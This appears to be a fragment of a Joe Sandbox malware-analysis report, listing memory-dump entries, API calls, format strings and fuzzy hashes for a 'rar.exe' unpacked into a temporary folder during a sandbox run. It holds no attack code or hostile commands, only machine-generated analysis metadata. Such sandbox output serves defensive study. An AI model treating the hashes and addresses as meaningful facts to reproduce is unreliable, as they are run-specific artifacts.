                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                        • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                        • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                        • Instruction ID: 82283e2babb1ec86d409a5201078fcab7709b3e0db6bf35e701b0224b68a00bd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4510862B197C196E7368B359941379BB92EB42BA4F088276C69CC7FD5CE2CD846C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF6AA1A475B,?,00000000,?,?,00007FF6AA1A4620,?,00000000,?), ref: 00007FF6AA1B4633
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                        • String ID: UNC$\\?\
                                                                                                                                                                                                                                        • API String ID: 1611563598-253988292
                                                                                                                                                                                                                                        • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                        • Instruction ID: 53739d8903b5bf0a72da6545b8bf4b1ad8cac97e3f7ad02d190cb98e98609c60
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6419011B0A682E0EA27AB51E5011B92392AF45BD4F81C6B3DD9DC77D7EE2CED47C600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: FileModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe
• API String ID: 3307058713-2419423084
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Similarity
• API ID: AttributesFilewcsstr
• String ID: System Volume Information\
• API String ID: 1592324571-4227249723
Similarity
• API ID: LoadString$fflushswprintf
• String ID: %d.%02d$[
• API String ID: 1946543793-195111373
Similarity
• API ID: snprintf
• String ID: $%s$@%s
• API String ID: 4288800496-834177443
Similarity
• API ID: swprintf
• String ID: fixed%u.$fixed.
• API String ID: 233258989-2525383582
                                                                                                                                                                                                                                        • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                        • Instruction ID: 9642bb995ca456c3b4cc0c1f4a4a816cf9b9ea9431a2979a1d5332e644db5701
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA31D522A09681E2EB12DB25E5013E963A0FB44790F904273EA9D9779ADF3CE907C740
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: LoadString
• String ID: Adding %-58s
• API String ID: 2948472770-2059140559
• Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
• Instruction ID: da4c0d2f4784e7ff996199c4c23743cf48eebb90ba99992fda09938daac68daa
• Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
• Instruction Fuzzy Hash: C1114975B1AA81C5E6119F16E944179B7A1FB98FC0B58847ACE0DC3328EE3CEA538244
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: ;%%0%du
• API String ID: 233258989-2249936285
• Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
• Instruction ID: fc86e5d9fee055a7112224516638544dc3176142e1c6746644eec49e65344079
• Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
• Instruction Fuzzy Hash: 28118622A09680D6E7229B24E4113E97761FB88B58F894172DF4D87659DE3CED46CB40
APIs
  • Part of subcall function 00007FF6AA1B42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6AA1B430F
• GetVolumeInformationW.KERNEL32(?,00007FF6AA1A0BED,?,?,00000000,?,?,00007FF6AA19F30F,00000000,00007FF6AA186380,?,00007FF6AA182EC8), ref: 00007FF6AA1A337E
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: InformationVolumeswprintf
• String ID: FAT$FAT32
• API String ID: 989755765-1174603449
• Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction ID: e3872978e12015d583b302082d2836d56257ee0059ed6bf2eb4d0b9e30bb34a9
• Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction Fuzzy Hash: D9118231B1DA82D1EB618B10E8913EA7395FF85344F805072E58DC3A95DF3CE91ACB04
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ErrorExceptionLastObjectSingleThrowWait
• String ID: WaitForMultipleObjects error %d, GetLastError %d
• API String ID: 564652978-2248577382
• Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
• Instruction ID: aedb1132c86be5c24486aafd513767af16e397eb9c3a303049633fda919e43d1
• Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
• Instruction Fuzzy Hash: C4E04F21E0A842E2E642A725AD810B83361EF60774FD403B3D43EC21E5AF2CAD47C311